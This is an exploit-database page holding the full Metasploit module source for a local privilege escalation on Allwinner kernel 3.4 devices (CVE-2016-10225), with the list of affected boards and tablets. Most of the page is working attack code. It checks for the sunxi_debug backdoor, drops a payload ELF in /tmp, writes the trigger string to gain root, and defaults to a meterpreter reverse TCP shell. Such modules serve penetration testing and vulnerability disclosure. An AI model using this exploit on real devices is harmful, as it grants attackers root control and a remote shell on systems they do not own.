Allwinner 3.4 Legacy Kernel Local Privilege Escalation

2016-09-2302:08:24

h00die <[email protected]>, KotCzarny

www.rapid7.com

JSON

This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4. Vulnerable OS: all OS images available for Orange Pis, any for FriendlyARM’s NanoPi M1, SinoVoip’s M2+ and M3, Cuebietech’s Cubietruck + Linksprite’s pcDuino8 Uno. Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Allwinner 3.4 Legacy Kernel Local Privilege Escalation',
        'Description' => %q{
          This module attempts to exploit a debug backdoor privilege escalation in
          Allwinner SoC based devices.

          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.

          Vulnerable OS: all OS images available for Orange Pis,
          any for FriendlyARM's NanoPi M1,
          SinoVoip's M2+ and M3,
          Cuebietech's Cubietruck +
          Linksprite's pcDuino8 Uno.
          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die <[email protected]>', # Module
          'KotCzarny' # Discovery
        ],
        'Platform' => [ 'android', 'linux' ],
        'DisclosureDate' => '2016-04-30',
        'DefaultOptions' => {
          'payload' => 'linux/armle/meterpreter/reverse_tcp'
        },
        'Privileged' => true,
        'Arch' => ARCH_ARMLE,
        'References' => [
          [ 'CVE', '2016-10225' ],
          [ 'URL', 'http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/'],
          [
            'URL', 'https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:' \
                   'https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us'
          ],
          [ 'URL', 'http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390']
        ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [ 'Auto', {} ]
        ],
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
        },
        'DefaultTarget' => 0
      )
    )
  end

  def check
    backdoor = '/proc/sunxi_debug/sunxi_debug'

    if file_exist?(backdoor)
      return CheckCode::Appears("#{backdoor} exists")
    end

    CheckCode::Safe("Backdoor #{backdoor} not found")
  end

  def exploit
    backdoor = '/proc/sunxi_debug/sunxi_debug'

    fail_with(Failure::NotVulnerable, "Backdoor #{backdoor} not found.") unless file_exist?(backdoor)

    pl = generate_payload_exe
    exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
    vprint_good "Backdoor Found, writing payload to #{exe_file}"
    write_file(exe_file, pl)
    cmd_exec("chmod +x #{exe_file}")

    vprint_good('Escalating')
    cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
  end
end

JSON